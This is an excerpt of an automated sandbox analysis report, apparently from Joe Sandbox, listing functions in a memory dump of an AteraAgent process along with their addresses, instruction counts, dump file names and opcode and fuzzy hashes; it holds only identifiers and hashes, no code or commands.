                                                                                                                                                                                                                                          Function 00007FFAAB585038 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 129f7767ce8debb8010b49c5425cb855fed44c97fbaa252eda399aaf8e26a33a
                                                                                                                                                                                                                                          • Instruction ID: 935bb2865aab5d51939b45909a887144f2d7c0c606a0511a26c3ca1533e78436
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 129f7767ce8debb8010b49c5425cb855fed44c97fbaa252eda399aaf8e26a33a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52F01D71A0992ECFDB94DF58D851AF8B372EB86211F0045B5D00DD3251CE3559458B81
                                                                                                                                                                                                                                          Function 00007FFAAB594F35 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3eac208aed24c9387bf761e66625a58fd0264a91ec8730c53fa7444d826ff57c
                                                                                                                                                                                                                                          • Instruction ID: 015dfb8670bd874105f91a09f9198ffa96625a50a6920130f1ee15fe1e734897
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3eac208aed24c9387bf761e66625a58fd0264a91ec8730c53fa7444d826ff57c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39F0E93151AA8B4FD315D72C94445E47790FF45350B5442BAD449C73A7EB19EC8587C0
                                                                                                                                                                                                                                          Function 00007FFAAB5932E8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dbff2e36fd5514a4e84974e5e4b7632e68a252013f061629c298ff0f1cf6cd22
                                                                                                                                                                                                                                          • Instruction ID: e4f83e621b43b1c91edd2c0b2ea0734a8f424cbb93c96dcda7c462fa369c1859
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbff2e36fd5514a4e84974e5e4b7632e68a252013f061629c298ff0f1cf6cd22
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DF05C2161AE1A8FDEACE32C50557BA23D5EB96340F440039D40FC3197DC59684A43C0
                                                                                                                                                                                                                                          Function 00007FFAAB588691 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 313e8958f7c31d2ca2d8a6e7c68873ee92c5985088c0f75e558dce6fc81d89b7
                                                                                                                                                                                                                                          • Instruction ID: d96d3e76b267b4e663057b1e688a84bda855e3e60230574553b94ded5ce2bdc9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 313e8958f7c31d2ca2d8a6e7c68873ee92c5985088c0f75e558dce6fc81d89b7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8F0A030C4560ECFC7149F95E4403FDB6B8FB4B205F402139D00DA2191C7B99699CB84
                                                                                                                                                                                                                                          Function 00007FFAAB59AB4D Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f23d72ec4c6e9378c5757e06ba1e770a9bd6a822c9ee4e76871128a88b7437df
                                                                                                                                                                                                                                          • Instruction ID: 181dff8668501a6b2a2e605b78220c38dfe1ad82fe0edc301d0e77a84cdc5855
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f23d72ec4c6e9378c5757e06ba1e770a9bd6a822c9ee4e76871128a88b7437df
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F02471C0E689CFD7529F24884A2FDBBF5EF07340F8190EAD40CC60B2DA2599088382
                                                                                                                                                                                                                                          Function 00007FFAAB598FC4 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: df507c862a15b4c12ea61eb50f8f6f6f1e29e7ca75ce93002f93c16201bdc028
                                                                                                                                                                                                                                          • Instruction ID: 28a068df637204749bed533ffe981d2a1764a10b10ad52220fc6ead9654ed6b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df507c862a15b4c12ea61eb50f8f6f6f1e29e7ca75ce93002f93c16201bdc028
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F0B42120E98A8FD794CB4CD4D4B6177E6FBA9351F0441A9C18DC7256C6329C0587C0
                                                                                                                                                                                                                                          Function 00007FFAAB58BC4A Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a1e66476adc6ff9f8717c4df170bb53f6ef1b76555ac5168626590a0aaed1f51
                                                                                                                                                                                                                                          • Instruction ID: e202b02b441a1bd4397ac33ac2e63f61cc459f177bebfb5d9bb686dffecd49e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1e66476adc6ff9f8717c4df170bb53f6ef1b76555ac5168626590a0aaed1f51
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF054A5D2560ADBE784F798C8959BCB7F6FF8C750F504034E04DD3293CE2968418B91
                                                                                                                                                                                                                                          Function 00007FFAAB588075 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e9997a20a632a8aeca57376c0e3c3b3ac0b50e36756f510009c13ecdb6241222
                                                                                                                                                                                                                                          • Instruction ID: 271ad43d66ca5713868928ab50742c5969a19c3ef23a58c012f922ea2301408e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9997a20a632a8aeca57376c0e3c3b3ac0b50e36756f510009c13ecdb6241222
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33E05271A0552D8EDB94EA68D451BEDB7B1FB94211F5044BAE00DE3252CA3569818B40
                                                                                                                                                                                                                                          Function 00007FFAAB59EE20 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a272f37034555c8048d430186746ad892fcde7af9d0f8de0f760fbe8c9903afc
                                                                                                                                                                                                                                          • Instruction ID: 45996f564bede9fb7b18478a20ae02fb25cc7fc521f9fcd2dfe9cf42caa4b65a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a272f37034555c8048d430186746ad892fcde7af9d0f8de0f760fbe8c9903afc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CE01250906AC94FEB99E72D49815813BD0EF1B3C0BC90091D84DCB263E54E9E894752
                                                                                                                                                                                                                                          Function 00007FFAAB58A008 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7bf89b6ffcfbd660f92aaaadabdb09c39adae142ed7667e1c560c986bc2aa8c8
                                                                                                                                                                                                                                          • Instruction ID: 6c165a04c285d8f8ad5155d38e71ed3d2073666b0642e36cce8760ada1fdcf3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bf89b6ffcfbd660f92aaaadabdb09c39adae142ed7667e1c560c986bc2aa8c8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13D02B82C1BA878EE6B46329080A2750DCBEBC61D0F5C82B8E09EC3197DC1E5C0C02C0
                                                                                                                                                                                                                                          Function 00007FFAAB589D24 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b4cd8d9f60e3bcf46a9054b38dcb85d02c16dfa4ebcd86977f812ebe06c07604
                                                                                                                                                                                                                                          • Instruction ID: c70a874dc6b298e222fc7cb8a3c58f103db7bccf631e983631e65ce34153e516
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4cd8d9f60e3bcf46a9054b38dcb85d02c16dfa4ebcd86977f812ebe06c07604
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AD02B02D1FB978AF279A3FD2892070BDC6DF46500F0894BDD04D82197EC4D7C4452C2
                                                                                                                                                                                                                                          Function 00007FFAAB5929A3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9998fd73ff94f4abfbb727c7c072ffce6182f97ff3bc4b48d382572d9e1475d3
                                                                                                                                                                                                                                          • Instruction ID: 2967b858bc5dd8a9f91e77b0dea2d13fe4fdec9dca527fbe42059d17f6b191ef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9998fd73ff94f4abfbb727c7c072ffce6182f97ff3bc4b48d382572d9e1475d3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52D05E3014A2414FCB58AE28E080C80B790EF1220435509E8E0044B2E3C52ADC82CB41
                                                                                                                                                                                                                                          Function 00007FFAAB5A1B51 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 474674f5463c92cd0da99d2f1716abc8fbe2759ae47b1c94f0d65721fdcca106
                                                                                                                                                                                                                                          • Instruction ID: a870cbacfc072283f2cdb87bc53f1ba4550d4bfa827481c3367ae067080ef7c6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 474674f5463c92cd0da99d2f1716abc8fbe2759ae47b1c94f0d65721fdcca106
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DD02271E0B78ACFD550CB0C00042282BC3EB432807040066A05EC20A7CE20880B038A